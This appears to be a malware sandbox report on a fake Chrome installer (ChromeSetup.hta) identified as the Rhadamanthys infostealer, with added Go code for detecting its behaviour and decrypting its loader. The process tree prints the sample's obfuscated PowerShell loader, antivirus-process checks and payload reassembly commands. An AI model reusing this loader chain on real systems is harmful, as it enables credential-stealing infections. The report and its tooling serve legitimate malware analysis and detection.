Analysis
- max time kernel: 1194s
- max time network: 1203s
- platform: windows10-2004_x64
- resource: win10v2004-20240319-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240319-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 28-03-2024 03:03

Static task: static1
Behavioral task: behavioral1 (sample: ChromeSetup.hta, resource: win10-20240221-en)
Behavioral task: behavioral2 (sample: ChromeSetup.hta, resource: win10v2004-20240319-en)
Behavioral task: behavioral3 (sample: ChromeSetup.hta, resource: win11-20240221-en)
General
- Target: ChromeSetup.hta
- Size: 140KB
- MD5: d92c49ca712a0503de3e182f66e3dcba
- SHA1: 97f716142447128859561a75e4677f978aca7fad
- SHA256: 908ca27ec447937b2f97fd4053a8fea99f45bc7e2eb028152f2301c97f952acf
- SHA512: fdc26a2aa4f935286f77d04538bef4e7d0a3f99fec2a85544b5ab086ba1ab0fa758332f4aea26ea5f7e57f4bdb30854d64fd760e38d2bc2b31b414a97392b4e1
- SSDEEP: 768:p+/unhi1zOzZ+/unhi1zOzpBG3uJ1zxTg+/unhi1zOzxM+/unhi1zOz:pti5OzZti5OzpB91tgti5Ozati5Oz
Malware Config
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
description | pid | Process | procid_target
PID 5404 created 2660 | 5404 | Donations.pif | 45
(PID 2660 is sihost.exe in the process tree below; dialer.exe, PID 1760, appears there as its child.)
Blocklisted process makes network request 2 IoCs
Processes:
flow | pid | Process
26 | 1544 | powershell.exe
38 | 1544 | powershell.exe
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up the country code configured in the registry, likely a geofence.
Processes:
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\Control Panel\International\Geo\Nation | mshta.exe
Key value queried | \REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\Control Panel\International\Geo\Nation | ChromeSetup.exe
Executes dropped EXE 2 IoCs
Processes:
pid | Process
2964 | ChromeSetup.exe
5404 | Donations.pif
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
pid | pid_target | Process | procid_target
1116 | 5404 | WerFault.exe | 130
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | AcroRd32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | AcroRd32.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
pid | Process
8 | tasklist.exe
5200 | tasklist.exe
Modifies Internet Explorer settings 1 IoCs
Processes:
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | AcroRd32.exe
Modifies registry class 1 IoCs
Processes:
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000_Classes\Local Settings | powershell.exe
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 35 IoCs
Processes (in the order listed, with repeat counts):
pid | Process | events
1544 | powershell.exe | 3
5404 | Donations.pif | 6
4520 | AcroRd32.exe | 20
5404 | Donations.pif | 2
1760 | dialer.exe | 4
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
description | pid | Process
Token: SeDebugPrivilege | 1544 | powershell.exe
Token: SeDebugPrivilege | 8 | tasklist.exe
Token: SeDebugPrivilege | 5200 | tasklist.exe
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
pid | Process | events
4520 | AcroRd32.exe | 1
5404 | Donations.pif | 3
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
pid | Process | events
5404 | Donations.pif | 3
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
pid | Process | events
4520 | AcroRd32.exe | 5
Suspicious use of WriteProcessMemory 64 IoCs
Processes (each row groups identical consecutive events; the counts sum to the 64 IoCs listed):
description | pid | Process | procid_target | events
PID 4436 wrote to memory of 1544 | 4436 | mshta.exe | 97 | 3
PID 1544 wrote to memory of 4520 | 1544 | powershell.exe | 101 | 3
PID 4520 wrote to memory of 220 | 4520 | AcroRd32.exe | 109 | 3
PID 1544 wrote to memory of 2964 | 1544 | powershell.exe | 110 | 3
PID 220 wrote to memory of 2440 | 220 | RdrCEF.exe | 112 | 43
PID 220 wrote to memory of 1744 | 220 | RdrCEF.exe | 113 | 9
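The signatures above describe behaviours that can be detected from ordinary process-creation telemetry. The following is an added example written for this page, not code from the sandbox or from the sample: a small Go scanner that runs a handful of rules over a constructed event stream modelled on the process tree in the Processes section (PIDs, images and command lines are taken from the report; the powershell command line is shortened; the parent/creator split for dialer.exe is an assumed encoding of the NtCreateUserProcessOtherParentProcess signature, since Sysmon-style logs only carry the declared parent and you need a source that records the creating process). The rule names, the ProcEvent type and the regular expressions are this example's own.

```go
package main

import (
	"fmt"
	"regexp"
	"sort"
	"strings"
)

// ProcEvent is a minimal process-creation record of the kind Sysmon event ID 1
// or an EDR agent produces. CreatorPid is the process that actually called the
// create-process API; a sandbox records it separately from the declared parent,
// which is how a spoofed parent (NtCreateUserProcessOtherParentProcess) shows up.
type ProcEvent struct {
	Pid, ParentPid, CreatorPid      int
	Image, ParentImage, CommandLine string
}

var (
	// cmd.exe "copy /b a + b + c out.pif": a chunked payload reassembled on disk.
	reCopyConcat = regexp.MustCompile(`(?i)\bcopy\s+/b\b.*\+.*[\w.-]+\.(pif|exe|scr|com)\b`)
	// ping -n N 127.0.0.1 used as a sleep before the next step.
	reLoopPing = regexp.MustCompile(`(?i)\bping(\.exe)?"?\s+-n\s+\d+\s+127\.0\.0\.1`)
	// powershell started with a hidden window (-w 1 / -WindowStyle Hidden).
	reHiddenPS = regexp.MustCompile(`(?i)\s-(w|windowstyle)\s+(1|hidden)\b`)
	// Security-product process names the sample greps for with findstr.
	avNames = []string{"wrsa.exe", "opssvc.exe", "avastui.exe", "avgui.exe", "nswscsvc.exe", "sophoshealth.exe"}
)

func baseName(image string) string {
	i := strings.LastIndexAny(image, `\/`)
	return strings.ToLower(image[i+1:])
}

// Findings returns one label per rule that matches a single event.
func Findings(e ProcEvent) []string {
	var out []string
	img, parent, cl := baseName(e.Image), baseName(e.ParentImage), strings.ToLower(e.CommandLine)
	if e.CreatorPid != 0 && e.CreatorPid != e.ParentPid {
		out = append(out, "spoofed-parent")
	}
	if img == "powershell.exe" && parent == "mshta.exe" && reHiddenPS.MatchString(e.CommandLine) {
		out = append(out, "mshta-hidden-powershell")
	}
	if img == "cmd.exe" && reCopyConcat.MatchString(e.CommandLine) {
		out = append(out, "copy-b-concat-executable")
	}
	if img == "findstr.exe" {
		for _, name := range avNames {
			if strings.Contains(cl, name) {
				out = append(out, "av-process-discovery")
				break
			}
		}
	}
	if img == "ping.exe" && reLoopPing.MatchString(e.CommandLine) {
		out = append(out, "loopback-ping-delay")
	}
	return out
}

// Scan maps each flagged PID to its findings.
func Scan(events []ProcEvent) map[int][]string {
	res := map[int][]string{}
	for _, e := range events {
		if f := Findings(e); len(f) > 0 {
			res[e.Pid] = f
		}
	}
	return res
}

// SampleEvents is a constructed stream modelled on this report's process tree.
func SampleEvents() []ProcEvent {
	const sys = `C:\Windows\SysWOW64\`
	const ps = sys + `WindowsPowerShell\v1.0\powershell.exe`
	const drop = `C:\Users\Admin\AppData\Roaming\ChromeSetup.exe`
	return []ProcEvent{
		{Pid: 4436, Image: sys + "mshta.exe", CommandLine: sys + `mshta.exe "C:\Users\Admin\AppData\Local\Temp\ChromeSetup.hta"`},
		{Pid: 1544, ParentPid: 4436, CreatorPid: 4436, ParentImage: sys + "mshta.exe", Image: ps,
			CommandLine: `"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function TLcToxJS($Imjw){...}`},
		{Pid: 2964, ParentPid: 1544, CreatorPid: 1544, ParentImage: ps, Image: drop, CommandLine: `"` + drop + `"`},
		{Pid: 3120, ParentPid: 2964, CreatorPid: 2964, ParentImage: drop, Image: sys + "cmd.exe", CommandLine: `"C:\Windows\System32\cmd.exe" /k move Bathrooms Bathrooms.bat & Bathrooms.bat & exit`},
		{Pid: 8, ParentPid: 3120, CreatorPid: 3120, ParentImage: sys + "cmd.exe", Image: sys + "tasklist.exe", CommandLine: "tasklist"},
		{Pid: 5128, ParentPid: 3120, CreatorPid: 3120, ParentImage: sys + "cmd.exe", Image: sys + "findstr.exe", CommandLine: `findstr /I "wrsa.exe opssvc.exe"`},
		{Pid: 5208, ParentPid: 3120, CreatorPid: 3120, ParentImage: sys + "cmd.exe", Image: sys + "findstr.exe", CommandLine: `findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"`},
		{Pid: 5328, ParentPid: 3120, CreatorPid: 3120, ParentImage: sys + "cmd.exe", Image: sys + "cmd.exe", CommandLine: `cmd /c copy /b Compound + Injection + Emotions + Worm + Participants 13140\Donations.pif`},
		{Pid: 5404, ParentPid: 3120, CreatorPid: 3120, ParentImage: sys + "cmd.exe", Image: `C:\Users\Admin\AppData\Local\Temp\13140\Donations.pif`, CommandLine: `13140\Donations.pif 13140\x`},
		{Pid: 5432, ParentPid: 3120, CreatorPid: 3120, ParentImage: sys + "cmd.exe", Image: sys + "PING.EXE", CommandLine: "ping -n 5 127.0.0.1"},
		// Declared parent sihost.exe (2660), real creator Donations.pif (5404): assumed encoding of the sandbox signature.
		{Pid: 1760, ParentPid: 2660, CreatorPid: 5404, ParentImage: `C:\Windows\system32\sihost.exe`, Image: sys + "dialer.exe", CommandLine: `"C:\Windows\system32\dialer.exe"`},
	}
}

func main() {
	res := Scan(SampleEvents())
	pids := make([]int, 0, len(res))
	for pid := range res {
		pids = append(pids, pid)
	}
	sort.Ints(pids)
	for _, pid := range pids {
		fmt.Printf("pid %-5d %s\n", pid, strings.Join(res[pid], ", "))
	}
}
```

On the constructed stream the scanner flags six processes: the hidden-window powershell under mshta (1544), both findstr AV lookups (5128, 5208), the copy /b reassembly of Donations.pif (5328), the loopback ping delay (5432) and dialer.exe with a creator that is not its declared parent (1760). The tasklist and Donations.pif events are deliberately not matched on their own: tasklist is common in admin scripts, and the spoofed-parent rule fires on the child, where the telemetry actually differs.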
Processes (nested by depth in the process tree)
- C:\Windows\system32\sihost.exe (PID 2660)
  Command line: sihost.exe
  - C:\Windows\SysWOW64\dialer.exe (PID 1760)
    Command line: "C:\Windows\system32\dialer.exe"
    Signatures: Suspicious behavior: EnumeratesProcesses
- C:\Windows\SysWOW64\mshta.exe (PID 4436)
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\ChromeSetup.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1544)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function TLcToxJS($Imjw){return -split ($Imjw -replace '..', '0x$& ')};$eGLbfA = TLcTox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xBQDa = [System.Security.Cryptography.Aes]::Create();$xBQDa.Key = TLcToxJS('466371524D774563634159445A6A426E');$xBQDa.IV = New-Object byte[] 16;$PuTlXHvG = $xBQDa.CreateDecryptor();$BgiNlDJqW = $PuTlXHvG.TransformFinalBlock($eGLbfA, 0, $eGLbfA.Length);$HxMgCSafi = [System.Text.Encoding]::Utf8.GetString($BgiNlDJqW);$PuTlXHvG.Dispose();& $HxMgCSafi.Substring(0,3) $HxMgCSafi.Substring(3)
    Signatures: Blocklisted process makes network request; Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe (PID 4520)
      Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\sample.pdf"
      Signatures: Checks processor information in registry; Modifies Internet Explorer settings; Suspicious behavior: EnumeratesProcesses; Suspicious use of FindShellTrayWindow; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 220)
        Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 2440)
          Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=811494109F7FCFB1CD03F931502C8FDD --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=811494109F7FCFB1CD03F931502C8FDD --renderer-client-id=2 --mojo-platform-channel-handle=1736 --allow-no-sandbox-job /prefetch:1
        - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 1744)
          Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E1AF6AB8429B57EEB8434AA81C9645C2 --mojo-platform-channel-handle=1860 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 2600)
          Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=E7170760948FB1C4040F29B9BC699851 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=E7170760948FB1C4040F29B9BC699851 --renderer-client-id=4 --mojo-platform-channel-handle=2168 --allow-no-sandbox-job /prefetch:1
        - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 2636)
          Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=EB81B056492B0B12BBCBECDB53C3CB34 --mojo-platform-channel-handle=2436 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 4956)
          Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8DC37E1534B34FF89D3B6AAA99DD8C1C --mojo-platform-channel-handle=2708 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 5052)
          Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3E15F7EC8818652FB7A0609EF276A434 --mojo-platform-channel-handle=2448 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
    - C:\Users\Admin\AppData\Roaming\ChromeSetup.exe (PID 2964)
      Command line: "C:\Users\Admin\AppData\Roaming\ChromeSetup.exe"
      Signatures: Checks computer location settings; Executes dropped EXE
      - C:\Windows\SysWOW64\cmd.exe (PID 3120)
        Command line: "C:\Windows\System32\cmd.exe" /k move Bathrooms Bathrooms.bat & Bathrooms.bat & exit
        - C:\Windows\SysWOW64\tasklist.exe (PID 8)
          Command line: tasklist
          Signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
        - C:\Windows\SysWOW64\findstr.exe (PID 5128)
          Command line: findstr /I "wrsa.exe opssvc.exe"
        - C:\Windows\SysWOW64\tasklist.exe (PID 5200)
          Command line: tasklist
          Signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
        - C:\Windows\SysWOW64\findstr.exe (PID 5208)
          Command line: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
        - C:\Windows\SysWOW64\cmd.exe (PID 5316)
          Command line: cmd /c md 13140
        - C:\Windows\SysWOW64\cmd.exe (PID 5328)
          Command line: cmd /c copy /b Compound + Injection + Emotions + Worm + Participants 13140\Donations.pif
        - C:\Windows\SysWOW64\cmd.exe (PID 5368)
          Command line: cmd /c copy /b Src + Expressions + Safari + Treasury 13140\x
        - C:\Users\Admin\AppData\Local\Temp\13140\Donations.pif (PID 5404)
          Command line: 13140\Donations.pif 13140\x
          Signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage
          - C:\Windows\SysWOW64\WerFault.exe (PID 1116)
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5404 -s 912
            Signatures: Program crash
        - C:\Windows\SysWOW64\PING.EXE (PID 5432)
          Command line: ping -n 5 127.0.0.1
          Signatures: Runs ping.exe
- C:\Windows\System32\CompPkgSrv.exe (PID 2744)
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5336)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4540 --field-trial-handle=2320,i,3025503729105798828,9325691672526736153,262144 --variations-seed-version /prefetch:8
- C:\Windows\SysWOW64\WerFault.exe (PID 1636)
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5404 -ip 5404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2628)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3712 --field-trial-handle=2320,i,3025503729105798828,9325691672526736153,262144 --variations-seed-version /prefetch:8
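The powershell.exe command line in the tree above is the sample's second-stage decoder: TLcToxJS turns a hex string into bytes, the result is decrypted with AES using a hex-encoded key and a 16-byte all-zero IV (so CBC mode and PKCS#7 padding, the .NET defaults), and the first three characters of the decrypted text are invoked as a command with the rest as its argument. The following is an added example written for this page, not code from the sample or the sandbox: a stand-alone Go re-implementation of that routine that returns the decrypted text instead of executing it, for use in offline triage. The key is the one visible in the command line; the ciphertext blob is elided on the page, so EncryptStage and the plaintext "iexWrite-Host 'constructed second stage'" are constructed only to produce a sample input, and the verb "iex" is an assumption about the real stage.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/hex"
	"errors"
	"fmt"
)

// hexToBytes mirrors the loader's TLcToxJS helper. The PowerShell version
// rewrites every two hex characters as "0x.. " and splits the result into an
// array that PowerShell coerces to byte[]; plain hex decoding is equivalent.
func hexToBytes(s string) ([]byte, error) {
	return hex.DecodeString(s)
}

// pkcs7Unpad strips the PKCS#7 padding that .NET's Aes applies by default.
func pkcs7Unpad(b []byte) ([]byte, error) {
	if len(b) == 0 || len(b)%aes.BlockSize != 0 {
		return nil, errors.New("plaintext is not block aligned")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > aes.BlockSize {
		return nil, errors.New("bad padding length")
	}
	for _, c := range b[len(b)-n:] {
		if int(c) != n {
			return nil, errors.New("bad padding bytes")
		}
	}
	return b[:len(b)-n], nil
}

// DecryptStage reproduces the loader's decryption step: AES with the
// hex-encoded key, a 16-byte all-zero IV (New-Object byte[] 16), CBC mode and
// PKCS#7 padding. Nothing is executed; the decrypted UTF-8 text is returned.
func DecryptStage(keyHex, blobHex string) (string, error) {
	key, err := hexToBytes(keyHex)
	if err != nil {
		return "", err
	}
	ct, err := hexToBytes(blobHex)
	if err != nil {
		return "", err
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", errors.New("ciphertext is not a multiple of 16 bytes")
	}
	block, err := aes.NewCipher(key) // a 16-byte key selects AES-128
	if err != nil {
		return "", err
	}
	iv := make([]byte, aes.BlockSize)
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	pt, err = pkcs7Unpad(pt)
	if err != nil {
		return "", err
	}
	return string(pt), nil
}

// SplitInvocation mirrors `& $s.Substring(0,3) $s.Substring(3)`: the first
// three characters are the command the loader invokes, the rest its argument.
func SplitInvocation(s string) (verb, arg string, err error) {
	if len(s) < 3 {
		return "", "", errors.New("decrypted text shorter than three characters")
	}
	return s[:3], s[3:], nil
}

// EncryptStage is the inverse operation. It exists only to build a constructed
// test blob, because the sample's real ciphertext is not reproduced on the page.
func EncryptStage(keyHex, plaintext string) (string, error) {
	key, err := hexToBytes(keyHex)
	if err != nil {
		return "", err
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	pad := aes.BlockSize - len(plaintext)%aes.BlockSize
	pt := append([]byte(plaintext), bytes.Repeat([]byte{byte(pad)}, pad)...)
	ct := make([]byte, len(pt))
	cipher.NewCBCEncrypter(block, make([]byte, aes.BlockSize)).CryptBlocks(ct, pt)
	return hex.EncodeToString(ct), nil
}

func main() {
	// Key copied from the sample's command line; the plaintext is constructed.
	const keyHex = "466371524D774563634159445A6A426E"
	key, _ := hexToBytes(keyHex)
	fmt.Printf("key as ASCII: %q\n", key)
	blob, _ := EncryptStage(keyHex, "iexWrite-Host 'constructed second stage'")
	text, err := DecryptStage(keyHex, blob)
	if err != nil {
		panic(err)
	}
	verb, arg, _ := SplitInvocation(text)
	fmt.Printf("verb=%q\narg=%q\n", verb, arg)
}
```

Decoding the key hex shows it is the printable string FcqRMwEccAYDZjBn, which is the usual pattern for loaders that generate a random ASCII key per build. To use this on a real capture, paste the hex blob that the elided TLcToxJS call receives into DecryptStage; a padding error usually means the wrong key or a truncated blob rather than a different cipher mode.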
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 36KB
  MD5: b30d3becc8731792523d599d949e63f5
